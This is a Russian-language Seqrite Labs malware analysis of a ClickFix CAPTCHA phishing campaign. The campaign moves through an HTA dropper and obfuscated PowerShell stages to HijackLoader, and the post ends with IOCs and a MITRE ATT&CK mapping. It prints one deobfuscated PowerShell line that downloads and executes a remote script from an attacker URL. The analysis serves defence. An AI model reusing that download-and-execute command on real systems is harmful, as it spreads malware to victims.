• Продукция и Услуги
        • облако

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • На Прем

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Платформа

          • Malware Analysis Platform
        • Малый бизнес

          • SOHO Total Edition
        • Услуги

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • Кибербезопасность и Data Privacy Awareness
  • Решения
    • BFSI
    • Образование
    • Правительство
    • Здравоохранение
    • ITeS
    • Производство
  • O компании
    • О нас Seqrite
    • Руководство
    • Награды и сертификаты
    • Новости
  • Партнёры
    • Партнерская программа
    • Найти партнера
    • Стать партнером
  • Поддержка
  • Ресурсы
    • статьи
    • Статьи
    • Даташит
    • Сферы деятельности
    • Отчеты об угрозах
    • Руководства
    • точка зрения
    • Понимание Data Privacy
    • Проверьте свой рейтинг риска
    • Диалоги ДПДП
    • Час конфиденциальности
Seqrite Labs Блог
Связаться с отделом продаж Под обстрелом?
  • Продукция и Услуги
        • облако

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • На Прем

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Платформа

          • Malware Analysis Platform
        • Малый бизнес

          • SOHO Total Edition
        • Услуги

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • Кибербезопасность и Data Privacy Awareness
  • Решения
    • BFSI
    • Образование
    • Правительство
    • Здравоохранение
    • ITeS
    • Производство
  • O компании
    • О нас Seqrite
    • Руководство
    • Награды и сертификаты
    • Новости
  • Партнёры
    • Партнерская программа
    • Найти партнера
    • Стать партнером
  • Поддержка
  • Ресурсы
    • статьи
    • Статьи
    • Даташит
    • Сферы деятельности
    • Отчеты об угрозах
    • Руководства
    • точка зрения
    • Понимание Data Privacy
    • Проверьте свой рейтинг риска
    • Диалоги ДПДП
    • Час конфиденциальности
Главная  /  Технические  / Разбор киберобмана: анализ фишинговой кампании Clickfix HijackLoader 
Разоблачение киберобмана: анализ фишинговой кампании Clickfix HijackLoader 
12 сентябрь 2025

Разоблачение киберобмана: анализ фишинговой кампании Clickfix HijackLoader 

Написано Шрутирупа Банерджи
Шрутирупа Банерджи
Технические

Содержание 

  • Введение 
    • Растущая угроза атак со стороны загрузчиков 
    • Цель этого блога 
  • Техническая методология и анализ 
    • Первоначальный доступ и социальная инженерия 
    • Многоступенчатая обфускация и деобфускация 
    • Методы антианализа 
    • Последняя полезная нагрузка 
  • Заключение 
  • МНК 
  • Быстрое заживление Seqrite Protection 
  • MITRE ATT&CK Картографирование 

 

Введение 

С развитием киберугроз окончательное выполнение вредоносной нагрузки перестало быть единственной задачей индустрии кибербезопасности. Загрузчики атак стали критически важным элементом современных атак, служа основным вектором начального доступа и обеспечивая скрытую доставку сложного вредоносного ПО в организацию. В отличие от простых полезных нагрузок, загрузчики разрабатываются с конкретной целью: обойти средства защиты, обеспечить устойчивость и создать благоприятную среду для скрытого выполнения вредоносного ПО финальной стадии. Это делает их более значимой и актуальной угрозой, требующей целенаправленного анализа. 

В последнее время мы наблюдаем всплеск HijackLoader Вредоносное ПО. Оно первое появившийся во второй половине 2023 года и быстро получила Внимание к нему привлекла его способность доставлять полезные грузы и интересные методы их загрузки и запуска. В основном он выглядит как Вредоносное ПО как услуга, Который был наблюдается в основном в финансово мотивированных кампаниях по всему миру.  

HijackLoader распространяется через поддельные установщики, отравленные SEO веб-сайты, вредоносная реклама и пиратское программное обеспечение/порталы фильмов, что обеспечивает широкую и адаптивную базу жертв. 

С июня 2025 года мы наблюдали, как злоумышленники использовали Clickfix, побуждая ничего не подозревающих жертв загружать вредоносные MSI-установщики, что, в свою очередь, приводило к запуску HijackLoader. В результате на компьютер жертвы был загружен DeerStealer в качестве конечного исполняемого файла.  

Недавно было также замечено, что TAG-150 появился вместе с CastleLoader/CastleBot, а также использовал внешние сервисы, такие как HijackLoader, как часть своей более широкой экосистемы «вредоносное ПО как услуга». 

HijackLoader часто доставляет воры и крысы Постоянно совершенствуя своё мастерство. Он особенно известен своими передовыми методами уклонения от атак, такими как: 

  • Процесс дублирования с транзакционными разделами 
  • Отсоединение системных DLL-библиотек 
  • Прямые системные вызовы в WOW64 
  • Подмена стека вызовов 
  • Анти-ВМ проверки 

С момента своего обнаружения HijackLoader постоянно развивается, представляя постоянную и растущую угрозу для различных отраслей. Поэтому организациям крайне важно организовать и поддерживать постоянный мониторинг таких загрузчиков, чтобы снизить риск сложных многоэтапных атак. 

Цепочка заражения 

Цепочка заражения

Технический обзор 

Первоначальный доступ начинается с Фишинговая кампания социальной инженерии на основе CAPTCHA, которую мы идентифицировали как Clickfix (данная техника также использовалась злоумышленниками в июне 2025 года). 

Рис. 1: Фишинговая страница на основе CAPTCHA для социальной инженерии
Рис. 2: Файл HTA Dropper для первоначального выполнения

 Этот файл HTA служит начальным загрузчиком, приводящим к выполнению файла PowerShell.   

Рис. 3: Начальный скрипт загрузчика PowerShell

После декодирования приведенной выше строки, закодированной в формате Base64, мы получили еще один скрипт PowerShell, показанный ниже. 

Рис. 4: Первый этап запутывания скрипта PowerShell

Приведённый выше декодированный скрипт PowerShell сильно запутан, что представляет серьёзную проблему для статического анализа и обнаружения на основе сигнатур. Вместо использования читаемых строк и переменных он динамически формирует команды и значения посредством сложных математических операций и реконструкции строк из символьных массивов. 

При разрешении вышеуказанной полезной нагрузки мы видим, что она декодируется в приведенную ниже команду, которая, хотя и остается нечитаемой, может быть полностью деобфусцирована. 

Рис. 5: Деобфускация обфусцированной полезной нагрузки первой ступени

После полной деобфускации мы видим, что скрипт пытается подключиться к URL-адресу для загрузки последующего файла.  

iex ((New-Object System.Net.WebClient).DownloadString('https://rs.mezi[.]bet/samie_bower.mp3'))  

При запуске в отладчике этот скрипт возвращает ошибку, указывающую на невозможность подключения к URL-адресу.  

Рис. 6: Отладочное представление неудавшегося соединения C2

Файл samie-bower.mp3 — еще один скрипт PowerShell, состоящий из более чем 18,000 XNUMX строк, который сильно запутан и представляет собой следующий этап загрузчика. 

Рис. 7: Основной загрузчик PowerShell (samie_bower.mp3)

В процессе отладки мы видим, что этот файл PowerShell выполняет многочисленные Анти-ВМ проверки, включая проверку количества запущенных процессов и внесение изменений в ключи реестра.  

Рис. 8: Проверки на предмет обхода виртуальных машин и песочницы

Эти проверки, по-видимому, специально нацелены и считывают Идентификаторы VirtualBox чтобы определить, запущен ли скрипт в виртуализированной среде. 

При анализе скрипта мы заметили, что окончательная полезная нагрузка находится в последних нескольких строках, где первоначальный обфусцированный загрузчик доставляет окончательную вредоносную команду. 

Рис. 9: Окончательное исполнение

 Вышеуказанное бессмысленное объявление переменной было исправлено: при выполнении оно выполняет декодирование Base64, операции XOR и дополнительные процедуры дешифрования, прежде чем загрузить другой скрипт PowerShell, который, вероятно, внедряет PE-файл.  

Рис. 10: Промежуточный скрипт PowerShell для PE-инъекции
Рис. 11: Встроенная полезная нагрузка PE, закодированная в Base64

 

Расшифровка этого файла обнаруживает встроенный PE-файл, идентифицируемый по его Заголовок MZ. 

Рис. 12: Декодированный PE-файл с заголовком MZ

Этот PE-файл очень плотно упакован. исполняемый файл .NET. 

Рис. 13: Упакованная исполняемая полезная нагрузка .NET

Исполняемая полезная нагрузка загружает значительный объем кода, вероятно, извлеченного из раздела ресурсов. 

Рис. 14: Распаковка исполняемого файла .NET в памяти

После распаковки исполняемый файл, по-видимому, загружает DLL-файл. 

Рис. 15: Защищенная DLL-библиотека, загруженная в память

Этот DLL-файл также защищен, что, вероятно, предотвращает обратную разработку и анализ. 

Рис. 16: Индикаторы защиты DLL

HijackLoader Имеет историю использования многоэтапного процесса, включающего исполняемый файл и библиотеку DLL. На этом последнем этапе загрузчик пытается подключиться к серверу C2, с которого вредоносное ПО загружается. В этом случае вредоносная программа пытается подключиться к URL-адресу, указанному ниже. 

Рис. 17: Последняя попытка подключения к серверу C2

Хотя этот C2 больше не доступен, попытка подключения соответствует поведению Вредоносное ПО NekoStealer. Этот HijackLoader участвовал в загрузке различных вредоносных программ-кральщиков, включая Lumma. 

Заключение 

Для успешной защиты от сложных загрузчиков, таких как HijackLoader, необходимо сместить акцент со статичных, финальных полезных нагрузок на их динамические и постоянно развивающиеся механизмы доставки. Сосредоточившись на обнаружении начального доступа и промежуточных этапов обфускации, организации могут создать более устойчивую защиту от этой устойчивой угрозы. Не менее важно применять проактивный подход на всех уровнях, а не сосредотачиваться исключительно на начальном доступе или финальной полезной нагрузке. Именно на промежуточных уровнях злоумышленники часто вносят наиболее существенные изменения, способствуя успешному развертыванию вредоносного ПО. 

МНК: 

  • 1b272eb601bd48d296995d73f2cdda54ae5f9fa534efc5a6f1dab3e879014b57 
  • 37fc6016eea22ac5692694835dda5e590dc68412ac3a1523ba2792428053fbf4 
  • 3552b1fded77d4c0ec440f596de12f33be29c5a0b5463fd157c0d27259e5a2df 
  • 782b07c9af047cdeda6ba036cfc30c5be8edfbbf0d22f2c110fd0eb1a1a8e57d 
  • 921016a014af73579abc94c891cd5c20c6822f69421f27b24f8e0a044fa10184 
  • e2b3c5fdcba20c93cfa695f0abcabe218ac0fc2d7bc72c4c3af84a52d0218a82 
  • 52273e057552d886effa29cd2e78836e906ca167f65dd8a6b6a6c1708ffdfcfd 
  • c03eedf04f19fcce9c9b4e5ad1b0f7b69abc4bce7fb551833f37c81acf2c041e 
  • D0068b92aced77b7a54bd8722ad0fd1037a28821d370cf7e67cbf6fd70a608c4 
  • 50258134199482753e9ba3e04d8265d5f64d73a5099f689abcd1c93b5a1b80ee 
  • hxxps[:]//1h[.]vuregyy1[.]ru/3g2bzgrevl[.]hta  
  • 91 [.] 212 [.] 166 [.] 51 
  • 37[.]27[.]165[.]65:1477 
  • cosi[.]com[.]ar 
  • hxxps[:]//rs[.]mezi[.]bet/samie_bower.mp3 
  • hxxp[:]//77[.]91[.]101[.]66/ 

Быстрое заживление Seqrite Степень защиты: 

  • Script.Trojan.49900.GC 
  • Loader.StealerDropperCiR 
  • Trojan.InfoStealerCiR 
  • Trojan.Agent 
  • БДС/511 

MITRE Att&ck: 

тактика  Идентификатор техники  Название техники 
Первоначальный доступ  T1566.002  Фишинг: фишинговая ссылка (фишинговая страница CAPTCHA) 
T1189  Несанкционированная компрометация (вредоносная реклама, отравление SEO, поддельные установщики) 
Типы  T1059.001  Интерпретатор команд и сценариев: PowerShell 
Уклонение от защиты  T1027  Запутанные файлы или информация (многоэтапные запутанные скрипты) 
T1140  Деобфускация/декодирование файлов или информации (Base64, XOR-декодирование) 
T1562.001  Ослабление защиты: отключение или изменение инструментов (отключение DLL) 
T1070.004  Удаление индикатора: удаление файла (вероятно, используется в промежуточных загрузчиках) 
T1211  Эксплуатация для обхода защиты (прямые системные вызовы в WOW64) 
T1036  Маскарадинг (поддельные расширения типа .mp3 для скриптов PowerShell) 
Дискавери  T1082  Обнаружение системной информации (проверки виртуальных машин, запросы к реестру) 
T1497.001  Обход виртуализации/песочницы: проверка системы 
Настойчивость  T1547.001  Выполнение автозапуска при загрузке или входе в систему: ключи запуска реестра (внесение изменений в реестр) 
Сохранение/Отмена привилегий.  T1055  Процесс инъекции (процедуры инъекции ПЭ) 
Управление и контроль (C2)  T1071.001  Протокол прикладного уровня: веб-протоколы (трафик HTTP/HTTPS C2) 
T1105  Передача инструмента Ingress (загрузка дополнительных полезных данных) 
Воздействие / Сбор  Т1056 / Т1005  Захват входных данных / Данные из локальной системы (функция кражи информации из конечной полезной нагрузки) 

 

Авторы: 

Нирадж Лазарус Макасаре 

Шрутирупа Банерджи 

 предыдущий постEcholeak- Отправьте сообщение, извлеките секрет из ИИ второго пилота! (CVE-20...
Следующий пост  Почему региональные и кооперативные банки больше не могут полагаться на устаревшие...
Шрутирупа Банерджи

О Шрутирупе Банерджи

Меня зовут Шрутирупа, в настоящее время я работаю старшим исследователем в области безопасности в компании [название компании]. SEQRITE Лаборатории. Имея почти 5-летний опыт, я переключил свое внимание с блокчейна...

Статьи Шрутирупы Банерджи »

Похожие статьи

  • За кулисами возврата средств: от фишинга GST до RAT-программы Remcos через многоступенчатую цепочку заражения .NET.

    За кулисами возврата средств: от фишинга GST до RAT-программы Remcos через многоступенчатую цепочку заражения .NET.

    Июль 17, 2026
  • Операция ShadowRecruit: Кампания по распространению вредоносного ПО, ориентированная на поиск работы и использующая ControlR и Google Sheets для атаки на соискателей из Индии.

    Июль 14, 2026
  • От выставления счетов до AnyDesk: раскрытие фишинговой кампании, нацеленной на российские аэрокосмические организации.  

    Июль 7, 2026
Избранные авторы
  • Seqrite
    Seqrite

    Seqrite является ведущим поставщиком решений в области корпоративной кибербезопасности. Специализируется на...

    Прочитайте больше статей Seqrite
  • Джоти Карлекар
    Джоти Карлекар

    Я страстный писатель, которому нравится создавать контент о новых технологиях и...

    Прочтите другие статьи Джоти Карлекара
  • Бинеш П.
    Бинеш П.

    Я страстный энтузиаст кибербезопасности и преданный писатель. Обладая талантом...

    Читайте другие статьи Бинеша П.
  • Санджай Каткар
    Санджай Каткар

    Санджай Каткар — соуправляющий директор Quick Heal Technologies...

    Читайте другие статьи Санджая Каткара
Темы
склонный (25) Cyber-атака (36) кибер-атаки (58) кибератаки (16) кибератаки (15) Информационная безопасность (340) информационная безопасность (34) Киберугроза (33) кибер-угрозы (51) Данные нарушения (56) нарушения данных (29) Потеря данных (28) предотвращение потери данных (34) data privacy (16) защита данных (34) безопасность данных (19) DLP (50) ДПДП (14) ДПДПА (17) Шифрование (16) для защиты конечных точек (112) Безопасность предприятия (19) Эксплуатировать (13) GDPR (14) вредоносных программ (76) анализ вредоносных программ (14) вредоносная атака (23) МДМ (27) Microsoft (15) MITRE ATT & CK (13) Сетевая безопасность (26) фишинг (30) Ransomware (69) атака ransomware (31) атаки ransomware (31) защита от копирования (16) Seqrite (41) Seqrite Шифрование (27) Seqrite EPS (33) Seqrite Услуги (16) обнаружение угрозы (13) Threat Intelлигенция (20) UTM (34) Уязвимость (16) нулевое доверие (13)
Seqrite Labs

Ведущий поставщик решений по корпоративной ИТ-безопасности, упрощающий защиту конечных точек, данных и сетей с помощью лучших в своем классе решений по предотвращению, обнаружению и реагированию на угрозы по всему миру.

Подробнее о Seqrite

Наши соцсети:

Подпишитесь на нашу рассылку

Будьте в курсе последних тенденций и новостей в сфере кибербезопасности.

Загрузка
Продукция и Услуги
  • облако
  • Endpoint Protection
  • Endpoint Detection and Response
  • Mobile Device Management
  • BYOD
  • Extended Detection and Response
  • Zero Trust Network Access
  • Data Privacy
  • На Прем
  • Endpoint Protection
  • Endpoint Detection and Response
  • Data Privacy
  • Платформа
  • Malware Analysis Platform
  • Микро Бизнес
  • SOHO Total Edition
  • Услуги
  • Threat Intel
  • Digital Risk Protection Services (DRPS)
  • Ransomware Recovery as a Services (RRaaS)
  • DPDP Compliance
  • Managed Detection and Response
  • Кибербезопасность и Data Privacy Awareness
Ресурсы
  • статьи
  • Статьи
  • Даташит
  • Отчеты об угрозах
  • Руководства
  • точка зрения
  • Понимание Data Privacy
  • Диалоги ДПДП
  • Политика и соответствие
  • Лицензионное соглашение
  • GoDeep.AI
  • SIA
  • Час конфиденциальности
Свяжитесь с нами
  • Зарегистрированные офисы
  • Давайте поговорим о кибербезопасности
Поддержка
  • Техподдержка
  • Загрузка программного обеспечения
  • Автономное обновление
  • Обновление прошивки
  • Обновления
  • Документация
О Нас
  • О нас Seqrite
  • Руководство
  • Награды и признание
  • Новости
Сотрудничайте
  • Партнерская программа
  • Найти партнера
  • Стать партнером
  • Seqrite Сертификаты

© 2026 Quick Heal Technologies Ltd.

Карта сайта Политика конфиденциальности Юридическая информация Политика использования файлов cookie Условия эксплуатации